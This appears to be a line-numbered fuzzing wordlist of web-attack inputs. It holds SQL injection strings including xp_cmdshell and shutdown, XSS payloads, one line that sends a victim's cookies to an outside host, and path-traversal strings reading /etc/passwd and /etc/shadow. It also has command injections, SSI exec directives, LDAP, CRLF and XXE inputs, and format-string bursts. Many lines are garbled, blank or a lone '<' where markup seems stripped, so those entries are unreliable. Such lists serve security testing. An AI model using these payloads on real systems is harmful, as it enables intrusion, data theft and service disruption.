]]>"
22 | ">
24 | ">
25 | ">xxxyyy
26 | "\t"
27 | #
28 | #'
29 | #'
30 | #xA
31 | #xA#xD
32 | #xD
33 | #xD#xA
34 | $NULL
35 | $null
36 | %
37 | %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
38 | %00
39 | %00../../../../../../etc/passwd
40 | %00../../../../../../etc/shadow
41 | %00/
42 | %00/etc/passwd%00
43 | %01%02%03%04%0a%0d%0aADSF
44 | %08x
45 | %0A/usr/bin/id
46 | %0A/usr/bin/id%0A
47 | %0Aid
48 | %0Aid%0A
49 | %0a ping -i 30 127.0.0.1 %0a
50 | %oa ping -n 30 127.0.0.1 %0a
51 | %0a id %0a
52 | %0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a
53 | %0d
54 | %0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
55 | %0d%0aX-Injection-Header:%20AttackValue
56 | %20
57 | %20$(sleep%2050)
58 | %20'sleep%2050'
59 | %20d
60 | %20n
61 | %20s
62 | %20x
63 | %20|
64 | %21
65 | %22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
66 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
67 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
68 | %25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
69 | %2500
70 | %250a
71 | %26
72 | %27%20or%201=1
73 | %28
74 | %29
75 | %2A
76 | %2A%28%7C%28mail%3D%2A%29%29
77 | %2A%28%7C%28objectclass%3D%2A%29%29
78 | %2A%7C
79 | %2C
80 | %2e%2e%2f
81 | %3C
82 | %3C%3F
83 | %3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
84 | %3cscript%3ealert("XSS");%3c/script%3e
85 | %3cscript%3ealert(document.cookie);%3c%2fscript%3e
86 | %5C
87 | %5C/
88 | %60
89 | %7C
90 | %7f
91 | %99999999999s
92 | %A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
93 | %E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
94 | %F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
95 | %G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
96 | %X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
97 | %a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
98 | %d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
99 | %e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
100 | %f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
101 | %ff
102 | %g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
103 | %i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
104 | %o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
105 | %p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
106 | %s%p%x%d
107 | %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
108 | %u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
109 | %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
110 | &
111 | & id
112 | & ping -i 30 127.0.0.1 &
113 | & ping -n 30 127.0.0.1 &
114 | <
115 | <
116 | <
117 | <
118 | <
119 | <
120 | <
121 | <
122 | <
123 | <
124 |
125 |
126 |
127 |
128 | <
129 | <
130 | <
131 | <
132 | <
133 | <
134 | <
135 | <
136 | <
137 | <
138 | <
139 | <
140 | <
141 | <
142 | <
143 | <
144 | <
145 | <
146 | <
147 | <
148 | <
149 | <
150 | <
151 | <
152 | <
153 | <
154 | <
155 | <
156 | <
157 | <
158 | <
159 | <
160 | <
161 | <
162 | <
163 | <
164 | <
165 | <
166 | <
167 | <
168 | <
169 | <
170 | <
171 | <
172 | <
173 | <
174 | <
175 | <
176 | <
177 | <
178 | <
179 | <
180 | '
181 | '%20OR
182 | &id
183 | <
184 | <
185 | <!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
186 | <!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
187 | <!--#exec%20cmd="/usr/bin/id;-->
188 | <>"'%;)(&+
189 | <script>alert(document.cookie);<script>alert
190 | <script>alert(document.cookie);
191 | ";id"
192 | '
193 | ' (select top 1
194 | ' --
195 | ' ;
196 | ' UNION ALL SELECT
197 | ' UNION SELECT
198 | ' or ''='
199 | ' or '1'='1
200 | ' or '1'='1'--
201 | ' or 'x'='x
202 | ' or (EXISTS)
203 | ' or 0=0 #
204 | ' or 0=0 --
205 | ' or 1 in (@@version)--
206 | ' or 1=1 or ''='
207 | ' or 1=1--
208 | ' or a=a--
209 | ' or uid like '%
210 | ' or uname like '%
211 | ' or user like '%
212 | ' or userid like '%
213 | ' or username like '%
214 | '%20or%201=1
215 | '%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
216 | '';!--"=&{()}
217 | ') or ('a'='a
218 | '--
219 | '; exec master..xp_cmdshell
220 | '; exec xp_regread
221 | '; waitfor delay '0:30:0'--
222 | ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{}
223 | ';shutdown--
224 | '>
225 | '>
226 | 'hi' or 'x'='x';
227 | 'or select *
228 | 'sqlattempt1
229 | '||UTL_HTTP.REQUEST
230 | '||Utl_Http.request('http://') from dual--
231 | (
232 | (')
233 | (sqlattempt2)
234 | )
235 | ))))))))))
236 | *
237 | *'
238 | *'
239 | *(|(mail=*))
240 | *(|(objectclass=*))
241 | */*
242 | *|
243 | +
244 | +%00
245 | ,@variable
246 | -
247 | --
248 | --';
249 | --sp_password
250 | -1
251 | -1.0
252 | -2
253 | -20
254 | -268435455
255 | ..%%35%63
256 | ..%%35c
257 | ..%25%35%63
258 | ..%255c
259 | ..%5c
260 | ..%bg%qf
261 | ..%c0%af
262 | ..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
263 | ..%u2215
264 | ..%u2216
265 | ../
266 | ../../../../../../../../../../../../etc/hosts
267 | ../../../../../../../../../../../../etc/hosts%00
268 | ../../../../../../../../../../../../etc/passwd
269 | ../../../../../../../../../../../../etc/passwd%00
270 | ../../../../../../../../../../../../etc/shadow
271 | ../../../../../../../../../../../../etc/shadow%00
272 | ..\
273 | ..\..\..\..\..\..\..\..\..\..\etc\passwd
274 | ..\..\..\..\..\..\..\..\..\..\etc\passwd%00
275 | ..\..\..\..\..\..\..\..\..\..\etc\shadow
276 | ..\..\..\..\..\..\..\..\..\..\etc\shadow%00
277 | .\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
278 | .\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
279 | /
280 | /%00/
281 | /%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
282 | /%2A
283 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
284 | /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
285 | /'
286 | /'
287 | /,%ENV,/
288 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
289 | /..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
290 | /.../.../.../.../.../
291 | /../../../../../../../../%2A
292 | /../../../../../../../../../../../etc/passwd%00.html
293 | /../../../../../../../../../../../etc/passwd%00.jpg
294 | /../../../../../../../../../../etc/passwd
295 | /../../../../../../../../../../etc/passwd^^
296 | /../../../../../../../../../../etc/shadow
297 | /../../../../../../../../../../etc/shadow^^
298 | /../../../../../../../../bin/id|
299 | /..\../..\../..\../..\../..\../..\../boot.ini
300 | /..\../..\../..\../..\../..\../..\../etc/passwd
301 | /..\../..\../..\../..\../..\../..\../etc/shadow
302 | /./././././././././././etc/passwd
303 | /./././././././././././etc/shadow
304 | //
305 | //*
306 | /etc/passwd
307 | /etc/shadow
308 | /index.html|id|
309 | 0
310 | 0 or 1=1
311 | 00
312 | 0xfffffff
313 | 1
314 | 1 or 1 in (@@version)--
315 | 1 or 1=1--
316 | 1.0
317 | 1; waitfor delay '0:30:0'--
318 | 1;SELECT%20*
319 | 1||Utl_Http.request('http://') from dual--
320 | 2
321 | 2147483647
322 | 268435455
323 | 65536
324 | :response.write 111111
325 | ;
326 | ; ping 127.0.0.1 ;
327 | ;/usr/bin/id\n
328 | ;echo 111111
329 | ;id
330 | ;id;
331 | ;id\n
332 | ;id|
333 | ;ls -la
334 | ;system('/usr/bin/id')
335 | ;system('cat%20/etc/passwd')
336 | ;system('id')
337 | ;|/usr/bin/id|
338 | <
339 | < script > < / script>
340 | SCRIPT]]>alert('XSS');/SCRIPT]]>
342 | var n=0;while(true){n++;}]]>
343 |
344 | <<
345 | <<<
346 | <
347 | <>"'%;)(&+
348 |
349 | ]>&xxe;
350 | ]>&xxe;
351 | ]>&xxe;
352 | ]>&xxe;
353 |
354 | SCRIPT]]>alert('XSS');/SCRIPT]]>
355 | XSS
356 |
">
357 |
358 |
359 |
360 |
361 |
362 |
363 |
364 |
366 |
367 |
368 |
369 |
370 |
371 |
372 |
373 |
374 |
375 |
376 |
377 |
378 | ','')); phpinfo(); exit;/*
379 |
380 |
381 | <IMG SRC="javascript:alert('XSS')">